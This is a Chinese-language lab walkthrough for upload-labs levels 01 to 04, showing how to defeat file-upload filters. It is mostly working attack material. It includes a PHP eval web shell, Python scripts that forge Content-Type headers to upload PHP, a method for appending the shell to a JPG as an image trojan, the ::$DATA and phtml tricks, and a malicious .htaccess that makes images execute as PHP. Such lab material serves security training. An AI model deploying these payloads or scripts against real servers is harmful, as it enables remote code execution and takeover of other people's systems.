upload-labs
01 前端js繞過
ctrl+u查看源碼
function checkFile() {
var file = document.getElementsByName('upload_file')[0].value;
if (file == null || file == "") {
alert("請選擇要上傳的文件!");
return false;
}
//定義允許上傳的文件類型
var allow_ext = ".jpg|.png|.gif";
//提取上傳文件的類型
var ext_name = file.substring(file.lastIndexOf("."));
//判斷上傳文件類型是否允許上傳
if (allow_ext.indexOf(ext_name) == -1) {
var errMsg = "該文件不允許上傳,請上傳" + allow_ext + "類型的文件,當前文件類型爲:" + ext_name;
alert(errMsg);
return false;
}
}
將var allow_ext = ".jpg|.png|.gif";
改爲var allow_ext = ".jpg|.png|.gif|.php";
,用chrome瀏覽器,F12
打開dev tool,在console裏黏貼checkFile
函數,執行checkFile
即可上傳php。
<!-- test.php -->
<?php
@eval($_POST['cmd']);
?>
02 MIME繞過(1)
服務端MIME類型檢測也就是檢測Content-Type
的內容
Content-Type: application/octet-stream
Content-Type: image/jpeg
抓取正常的圖片流量,與源碼對比
抓包
Content-Disposition: form-data; name="upload_file"; filename="test.jpg"
Content-Type: image/jpeg
Content-Disposition: form-data; name="submit"
ctrl+u:源碼
<input class="input_file" type="file" name="upload_file"/>
<input class="button" type="submit" name="submit" value="上傳"/>
python3
requests.post
的files
參數如下
files = {
"upload_file" : ("test33.jpg", open(lfile, "rb"), "image/png"),
"submit": (None, lfile)
}
#est33.jpg 遠程文件名,lfile本地文件名,filename="test.jpg"後面沒東西填None
繞過代碼:
#coding:utf-8
import requests
def upload_img(lfile,url):
try:
#test33.php 遠程文件名,lfile本地文件名,filename="test.php"後面沒東西填None
files = {
"upload_file" : ("test33.php", open(lfile, "rb"), "image/png"),
"submit": (None, lfile)
}
req = requests.post(url, files=files)
print(req.text)
except Exception as e:
print(str(e))
pass
if __name__ == '__main__':
lfile = 'test.php'
url = 'http://192.168.22.130/upload-labs-master/Pass-02/index.php'
upload_img(lfile,url)
02 MIME繞過(2)
生成圖片木馬
cmd運行convert.bat
rem convert.bat
copy test.jpg/b+test.php/a test2.jpg
pause
rem a => ascii
<!-- test.php -->
<?php
@eval($_GET['cmd']);
?>
激活test2.jpg包含的php code
需要用php包含
,test2.php
:
<?php
include 'test2.jpg'
?>
執行
http://$uri/test2.php?cmd=phpinfo();
python 3
:
#coding:utf-8
import requests
def convert2img(file_img, file_php, target):
try:
f1 = open(file_img, 'rb')
f2 = open(file_php, 'rb')
f3 = open(target, 'wb+')
f3.write(f1.read())
f3.write(f2.read())
f1.close()
f2.close()
f3.close()
except Exception as e:
print('[-]: '+str(e))
def upload_img(lfile,url):
try:
#test2.jpg 遠程文件名,lfile本地文件名,filename="test.jpg"後面沒東西填None
files = {
"upload_file" : ("test2.jpg", open(lfile, "rb"), "image/png"),
"submit": (None, lfile)
}
req = requests.post(url, files=files)
if req.status_code == 200:
print("[+]: upload success")
except Exception as e:
print("[-]: upload failed")
print(str(e))
pass
if __name__ == '__main__':
file_img = 'test.jpg'
file_php = 'test.php'
target = 'test2.jpg'
convert2img(file_img, file_php, target)
lfile = target
url = 'http://192.168.22.130/upload-labs-master/Pass-02/index.php'
upload_img(lfile,url)
03 mime.types
$file_ext = str_ireplace('::$DATA', '', $file_ext);
//去除字符串::$DATA ,可以採用Windows文件流特性繞過
//文件名+"::$DATA"會把::$DATA之後的數據當成文件流處理,不會檢測後綴名.且保持"::$DATA"之前的文件名
Apache有解析漏洞,文件在/etc/mime.types
application/x-httpd-php phtml pht php
上傳phtml文件
04 .htaccess
Apache配置:
/etc/apache2/apache2.conf
AllowOverride All
Apache加載mod_Rewrite模塊
cp /etc/apache2/mods-available/rewrite.load /etc/apache2/mods-enabled/rewrite.load
rewrite.load內容:
LoadModule rewrite_module /usr/lib/apache2/modules/mod_rewrite.so
systemctl restart apache2
httpd配置:
/etc/httpd/conf/httpd.conf
AllowOverride All
/etc/httpd/conf.modules.d/00-base.conf
LoadModule rewrite_module /usr/lib/apache2/modules/mod_rewrite.so
systemctl restart httpd.service
#coding:utf-8
import requests
import time
URL = 'http://192.168.22.130/000/upload-labs-master'
def upload_img(lfile,url):
try:
files = {
"upload_file" : ("pass-04.jpg", open(lfile, "rb"), "image/png"),
"submit": (None, lfile)
}
req = requests.post(url, files=files)
if req.status_code == 200:
print("[+]: upload success")
except Exception as e:
print("[-]: upload failed")
print(str(e))
pass
def up_htaccess(lfile,url):
try:
files = {
"upload_file" : (".htaccess", open(lfile, "rb"), "text/plain"),
"submit": (None, lfile)
}
req = requests.post(url, files=files)
if req.status_code == 200:
print("[+]: upload success")
except Exception as e:
print("[-]: upload failed")
print(str(e))
pass
if __name__ == '__main__':
lfile_1 = 'pass-04.htaccess'
lfile_2 = 'pass-04.jpg'
url = URL + '/Pass-04/index.php'
up_htaccess(lfile_1,url)
time.sleep(1)
upload_img(lfile_2,url)
pass-04.htaccess內容(將文件當成php):
SetHandler application/x-httpd-php